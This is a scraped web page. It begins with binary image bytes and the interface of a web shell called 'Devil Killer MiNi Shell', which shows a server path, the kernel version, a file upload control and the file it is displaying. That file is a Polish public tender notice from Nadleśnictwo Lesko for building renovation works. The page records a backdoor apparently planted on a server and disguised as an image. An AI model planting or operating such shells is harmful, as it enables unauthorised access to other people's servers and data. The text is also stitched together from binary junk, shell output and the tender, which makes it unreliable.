JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220610/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220610/0020484201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa budynków Nadleśnictwa Lesko </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO LESKO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370014449</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łączki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lesko@krosno.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_lesko</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa budynków Nadleśnictwa Lesko </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-378e2d61-e8b2-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00204842</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00251751/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa budynków w Nadleśnictwie Lesko</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_lesko <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_lesko<br/>Komunikacja w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji<br/>elektronicznej.<br/>Komunikacja ustna jest dopuszczalna w odniesieniu do informacji, które nie są istotne, w szczególności<br/>nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia oraz ofert, o ile jej treść jest<br/>udokumentowana.<br/>Komunikacja między Zamawiającym, a Wykonawcami w niniejszym postępowaniu odbywa się przy<br/>użyciu platformy zakupowej Open Nexus - platformazakupowa.pl (dalej: „Platforma”):<br/>https://platformazakupowa.pl/pn/lasy_lesko . W sytuacji awarii platformy przy użyciu poczty<br/>elektronicznej: lesko@krosno.lasy.gov.pl, z zastrzeżeniem, że złożenie oferty, oświadczenia o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, a także innych oświadczeń<br/>lub dokumentów składanych wraz z ofertą następuje wyłącznie przy użyciu Platformy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wym.tech. i org. dotyczące w<br/>szczególności logowania, składania ofert, składania wniosków o<br/>wyjaśnienie treści SWZ, wysyłania i odbierania dokum. elektr., elektronicznych kopii dokumentów i<br/>oświadczeń oraz innych informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji<br/>korzystania z Platformy https://platformazakupowa.pl/strona/45-instrukcje, w zakładce „Instrukcje dla<br/>Wykonawców” oraz w Regulaminie korzystania z Platformy, dostępnym pod adresem:<br/>https://platformazakupowa.pl/strona/1-<br/>regulamin.Wykonawca, przystępując do niniejszego postępowania akceptuje warunki korzystania z<br/>Platformy<br/>określone w Regulaminie zamieszczonym na stronie internetowej pod wskazanym wyżej linkiem, w<br/>zakładce „Regulamin” oraz uznaje go za wiążący, a ponadto powinien zapoznać się z Instrukcją<br/>składania ofert dostępną pod wskazanym wyżej linkiem, i stosować do niej.<br/>Występuje limit liczby plików lub spakowanych folderów w zakresie całej oferty lub wniosku do liczby<br/>10 plików lub spakowanych folderów (pliki można spakować zgodnie z ust. 8 instrukcji dlawykonawców) przy maksymalnej wielkości<br/>pojedynczego pliku lub spakowanego folderu 150 MB<br/>Za datę złożenia oferty, oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu, a także innych oświadczeń lub dokumentów składanych wraz z ofertą przyjmuje się datę<br/>ich złożenia na Platformie https://platformazakupowa.pl/pn/lasy_lesko Za datę przekazania wniosków,<br/>zawiadomień, dokumentów, oświadczeń lub ich kopii oraz innych informacji przyjmuje się datę ich<br/>przekazania na adres poczty elektronicznej Zamawiającego lub złożenia na Platformie<br/>https://platformazakupowa.pl/pn/lasy_lesko<br/>Zamawiający, zgodnie z § 11 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. (Dz.U.<br/>z 2020 r. poz. 2452), określa wym. tech. umożliwiające korzystanie z udostępnianej Platformy<br/>https://platformazakupowa.pl/pn/lasy_lesko ., tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, jeden z systemów<br/>operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa w aktualnej wersji w przypadku Internet Explorer<br/>minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platforma działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8,<br/>7) oznaczenie czasu odbioru danych przez Platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany według czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania i wycofania ofert):<br/>1) Komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie oświadczeń,<br/>wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem<br/>dedykowanego formularza dostępnego na Platformie na stronie danego postępowania. W<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>numerem ogłoszenia opublikowanego w Biuletynie Zamówień Publicznych lub numerem postępowania<br/>wskazanym w SWZ.<br/>2) Zamawiający będzie również komunikować się z Wykonawcami za pomocą poczty elektronicznej –<br/>za pomocą adresu e-mail Zamawiającego wskazanego w ust. 3 oraz adresu e-mail Wykonawcy wskazanego w formularzu oferty.3) Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń<br/>składane będą przez Wykonawcę za pośrednictwem Platformy i formularza Wyślij wiadomość<br/>znajdującego się na stronie danego postępowania, jako załączniki. Zamawiający dopuszcza również<br/>możliwość składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń za pomocą poczty elektronicznej</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. W związku z rozpoczęciem obowiązywania z dniem 25<br/>maja 2018 r. Rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej nazwa<br/>RODO), stosownie do wymogów wynikających z art. 13 ust. 1 i ust. 2 tego aktu prawnego informujemy,<br/>że administratorem Państwa danych osobowych jest Nadleśnictwo Lesko z siedzibą 38-600 Lesko,<br/>Łączki 8. Przedstawicielem administratora jest : Nadleśniczy – Zbigniew Pawłowski.<br/>2. Z administratorem można skontaktować się: osobiście w siedzibie Nadleśnictwa Lesko telefonicznie<br/>pod numerem 13 460 14 70, za pomocą poczty elektronicznej e-mail pod<br/>adresem:lesko@krosno.lasy.gov.pl. Administrator nie wyznaczył Inspektora Ochrony Danych<br/>Osobowych.3. Przetwarzanie Państwa danych osobowych jest dokonywane w celu prawidłowej realizacji<br/>obowiązków ustawowych tj. przeprowadzenia postępowania o udzielenie zamówienia publicznego i<br/>zawarcia umowy z wybranym wykonawcą. Dane osobowe są przetwarzane na podstawie prawnej art.<br/>6 ust. 1 lit. b) i lit. c) RODO. Podanie danych jest dobrowolne, ale jest warunkiem wzięcia udziału w<br/>postępowaniu o udzielenie zamówienia publicznego oraz zawarcia umowy.<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 24 października<br/>2019 r. – Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2019 r. poz. 2019, ze zm.), dalej<br/>„ustawa Pzp”.<br/>5. Państwa dane osobowe mogą być przekazywane do organów państwowych (np. Policja,<br/>prokuratura) prowadzących postępowania (np. karne, o wykroczenia). Dane mogą być również<br/>przekazywane kancelarii prawnej prowadzącej obsługę prawną Nadleśnictwa, jak również do jednostek<br/>nadrzędnych Lasów Państwowych w szczególności do RDLP w Krośnie oraz DGLP. Ponadto dane<br/>osobowe będą udostępniane łącznie z dokumentacją dotyczącą postępowania o udzielenie<br/>zamówienia publicznego w przypadkach składania wniosków o udostępnienie informacji publicznej.<br/>6. Państwa dane osobowe są przetwarzane ręcznie oraz elektronicznie za pomocą Systemu<br/>Informatycznego Lasów Państwowych. Dane osobowe są i będą przetwarzane przez okres czasu<br/>wyznaczony przepisami o rachunkowości – nie dłużej niż 6 lat licząc od wystawienia ostatniej faktury,<br/>jak również wyznaczony przepisami kodeksu cywilnego o przedawnieniu roszczeń – podstawowy<br/>termin 6 lat od wymagalności roszczenia, jak również przez okres czasu wyznaczony przepisami (w<br/>tym wewnętrznymi) o archiwizacji dokumentów – w zależności od tego, który z tych okresów będzie<br/>najdłuższy. W przypadku przekazania danych osobowych do kancelarii prawnej, dane te będą tam<br/>przetwarzane przez okres czasu wyznaczony przepisami o adwokaturze lub o radcach prawnych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Stosownie do wymogów wynikających z przepisu art. 19 ust. 4 ustawy Pzp, Zamawiający<br/>informuje, że:<br/>1) W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje<br/>ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia<br/>zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 rozporządzenia 2016/679. (art. 74 ust. 3 ustawy Pzp)<br/>2) Udostępnianie protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1<br/>rozporządzenia 2016/679, zebranych w toku postępowania o udzielenie zamówienia. Ograniczenia zasady jawności, o których mowa<br/>w ust. 3 i art. 18 ust. 3–6, stosuje się odpowiednio. (art. 74 ust. 4 ustawy Pzp)<br/>3) W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym<br/>mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, Zamawiający może żądać od osoby występującej z żądaniem wskazania<br/>dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>(art.75 ustawy Pzp)<br/>4) Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego<br/>załączników. (art. 76 ustawy Pzp)<br/>5) Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania.(art. 19 ust. 3 ustawy Pzp)<br/>6) W przypadku danych osobowych zamieszczonych przez zamawiającego w Biuletynie Zamówień Publicznych, prawa, o którymowa<br/>w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do zamawiającego. (art. 269<br/>ust. 2 ustawy Pzp).<br/>10. Administrator dokłada wszelkich starań, aby zapewnić wszelkie środki fizycznej, technicznej i organizacyjnej ochrony danych osobowych przed ich przypadkowym czy umyślnym zniszczeniem, przypadkową utratą, zmianą, nieuprawnionym ujawnieniem,<br/>wykorzystaniem czy dostępem, zgodnie ze wszystkimi obowiązującymi przepisami.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.1.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na wymianie drzwi wejściowych wraz z ościeżnicami, rozebranie ścianek działowych drewnianych oraz demontaż boazerii, okładziny stropów płytami regipsowymi na suficie i na ścianach wraz z malowaniem na parterze i poddaszu. Wymiana stolarki okiennej i drzwiowej wewnętrznej, remont posadzek – rozebranie, wykonanie nowej i ułożenie płytek, wymiana płytek na ścianach w kuchni i łazienkach, wykonanie otworu celem przejścia z pokoju do kuchni, rozebranie pieca kaflowego kuchennego, remont ściany po demontażu pieca, cyklinowanie parkietu wraz z gruntowaniem i malowaniem, remont całej łazienki na parterze i poddaszu, licowanie i malowanie ścian wymiana płytek na ścianach i na posadzce, wymiana umywalki, wymiana muszli ustępowej i montaż nowej kabiny prysznicowej, wymiana baterii umywalkowych i montaż baterii natryskowej, wymiana całych schodów drewnianych na poddasze wraz z wymianą balustrady, montaż włazu na strych, rozebranie ścianki działowej w łazience i wykonanie nowej wraz z przesunięciem celem powiększenia łazienki na poddaszu, docieplenie ścian i sufitów na poddaszu wełną mineralną gr. 20 cm oraz ułożenie folii wraz z ułożeniem płyt OSB. Wykonanie przyłącza kanalizacyjnego z rur PCV o średnicy 160 mm wraz z 2 szt. studzienek kanalizacyjnych, od kotłowni do istniejącej studzienki rewizyjnej na istniejącym przyłączu kanalizacyjnym z kancelarii, wymiana instalacji elektrycznej wraz z pomiarami skuteczności zerowania i uziemienia, wymiana pieca co w kotłowni ogrzewanym na drewno wymiana naczynia zbiorczego oraz wymiana instalacji co i grzejników szt. 4 na parterze i poddaszu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 283800 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45331110-0 - Instalowanie kotłów</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do przedmiotu zamówienia Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy w stosunku do łącznej ilości wszystkich czynności wycenionych w każdej z pozycji kosztorysu ofertowego stanowiącego część Oferty („Opcja”). Przedmiotem Opcji będą takie same (analogiczne prace), jak opisane w SWZ i wycenione przez Wykonawcę w którejkolwiek z pozycji kosztorysu ofertowego stanowiącego część Oferty. W ramach Opcji, wedle wyboru Zamawiającego, mogą zostać zlecone wszystkie, niektóre lub tylko jedna z prac wskazanych w SWZ i wycenionych przez Wykonawcę w kosztorysie ofertowym stanowiącym część Oferty.<br/>Prace będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie przekraczała 20 % Wartości Przedmiotu Umowy określonej zgodnie z § 7 ust 1 stanowiącego załącznik nr 10 do SWZ. Podstawą określenia wartości prac zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych prac zawarte w kosztorysie ofertowym stanowiącym część Oferty.<br/>Zamawiający nie jest zobowiązany do zlecenia prac objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie. <br/>Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: (1) wystąpienia potrzeby zwiększenia zakresu rzeczowego robót budowlanych stanowiących przedmiot zamówienia na skutek warunków przyrodniczych, klimatycznych bądź atmosferycznych, (2) powierzenia Zamawiającemu nowych zadań inwestycyjnych lub publicznych, (3) braku możliwości wyłonienia z przyczyn obiektywnych wykonawców robót budowlanych w ramach podstawowych trybów udzielania zamówień, celem zabezpieczenia niezbędnego wykonawstwa prac oraz (4) powierzania wykonawcy prac stanowiących wykonawstwo zastępcze w stosunku do prac realizowanych przez innego wykonawcę. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia podstawowego, zamówienia polegającego na powtórzeniu podobnych robót budowlanych i zgodnego z przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp – o wartości do 50 % szacunkowej wartości zamówienia podstawowego.<br/>2.	Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót, stanowiących przedmiot zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych.<br/>3.	Zamówienia, o których mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane wg następującego wzoru:<br/>1)	W ramach kryterium „Cena” oceniana będzie cena łączna brutto podana w formularzu oferty. Ocena ofert w tym kryterium zostanie dokonana przy zastosowaniu poniższego wzoru: <br/>Cmin<br/>C = ------------------ x 100 pkt x 60%<br/>Co<br/><br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”<br/>Cmin - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/>2)	W ramach kryterium „Wydłużenie okresu gwarancji - G” oceniane będzie wydłużenie okresu Gwarancji na roboty budowlane w stosunku do minimalnego Okresu Gwarancji wynikającego z SWZ (tj. 12 miesięcy od dnia odbioru końcowego robót poświadczonego protokołem odbioru końcowego). Do oceny w ramach kryterium zostanie przyjęty Okres Gwarancji zadeklarowany w formularzu oferty.<br/>Ocena ofert w tym kryterium będą zostanie dokonana przy zastosowaniu poniższego wzoru:<br/>Go <br/>G = ------------------- x 100 pkt x 40%<br/>Gmax<br/><br/>gdzie:<br/>G – liczba punktów w kryterium „Wydłużenie okresu gwarancji”<br/>Go – długość okresu wydłużenia gwarancji podana w ocenianej ofercie<br/>Gmax – największa długość okresu wydłużenia gwarancji ze 